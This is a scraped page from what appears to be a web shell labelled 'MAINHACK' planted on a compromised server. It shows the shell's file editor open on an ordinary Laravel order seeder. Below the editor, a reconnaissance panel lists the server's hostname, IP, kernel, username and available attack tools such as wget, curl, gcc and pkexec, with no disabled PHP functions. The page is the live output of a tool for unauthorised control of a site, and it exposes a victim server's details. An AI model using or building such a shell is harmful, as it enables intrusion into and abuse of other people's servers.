[
MAINHACK
]
Mail Test
BC
Config Scan
HOME
Create...
New File
New Folder
Viewing / Editing File: OrderTableSeeder.php
<?php namespace Database\Seeders; use App\Enums\OrderStatus; use App\Enums\OrderType; use App\Enums\Source; use App\Enums\PosPaymentMethod; use Dipokhalder\EnvEditor\EnvEditor; use Illuminate\Database\Seeder; use App\Models\Order; class OrderTableSeeder extends Seeder { /** * Run the database seeds. * * @return void */ public function run() { $envService = new EnvEditor(); if ($envService->getValue('DEMO')) { Order::insert([ [ 'order_serial_no' => date('dmy') . '1', 'token' => 10, 'user_id' => 2, 'branch_id' => 1, 'subtotal' => 18.730000, 'discount' => 0.000000, 'delivery_charge' => 0.000000, 'total_tax' => 0.425000, 'total' => 18.730000, 'pos_payment_method' => PosPaymentMethod::CASH, 'order_type' => OrderType::TAKEAWAY, 'order_datetime' => now(), 'delivery_time' => '20:30 - 21:00', 'preparation_time' => 30, 'is_advance_order' => 10, 'payment_method' => 1, 'payment_status' => 5, 'status' => OrderStatus::DELIVERED, 'delivery_boy_id' => null, 'reason' => null, 'dining_table_id' => null, 'source' => Source::POS, 'created_at' => now(), 'updated_at' => now() ], [ 'order_serial_no' => date('dmy') . '2', 'token' => null, 'user_id' => 3, 'branch_id' => 1, 'subtotal' => 8.500000, 'discount' => 0.000000, 'delivery_charge' => 0.000000, 'total_tax' => 0.000000, 'total' => 8.500000, 'pos_payment_method' => PosPaymentMethod::CASH, 'order_type' => OrderType::DINING_TABLE, 'order_datetime' => now(), 'delivery_time' => '20:30 - 21:00', 'preparation_time' => 30, 'is_advance_order' => 10, 'payment_method' => 1, 'payment_status' => 5, 'status' => OrderStatus::ACCEPT, 'delivery_boy_id' => null, 'reason' => null, 'dining_table_id' => null, 'source' => Source::POS, 'created_at' => now(), 'updated_at' => now() ], ]); } } }
Save Changes
Cancel / Back
Close ×
Server Info
Hostname: server1.winmanyltd.com
Server IP: 203.161.60.52
PHP Version: 8.3.27
Server Software: Apache
System: Linux server1.winmanyltd.com 4.18.0-553.22.1.el8_10.x86_64 #1 SMP Tue Sep 24 05:16:59 EDT 2024 x86_64
HDD Total: 117.98 GB
HDD Free: 59.81 GB
Domains on IP: N/A (Requires external lookup)
System Features
Safe Mode:
Off
disable_functions:
None
allow_url_fopen:
On
allow_url_include:
Off
magic_quotes_gpc:
Off
register_globals:
Off
open_basedir:
None
cURL:
Enabled
ZipArchive:
Enabled
MySQLi:
Enabled
PDO:
Enabled
wget:
Yes
curl (cmd):
Yes
perl:
Yes
python:
Yes (py3)
gcc:
Yes
pkexec:
Yes
git:
Yes
User Info
Username: eliosofonline
User ID (UID): 1002
Group ID (GID): 1003
Script Owner UID: 1002
Current Dir Owner: 1002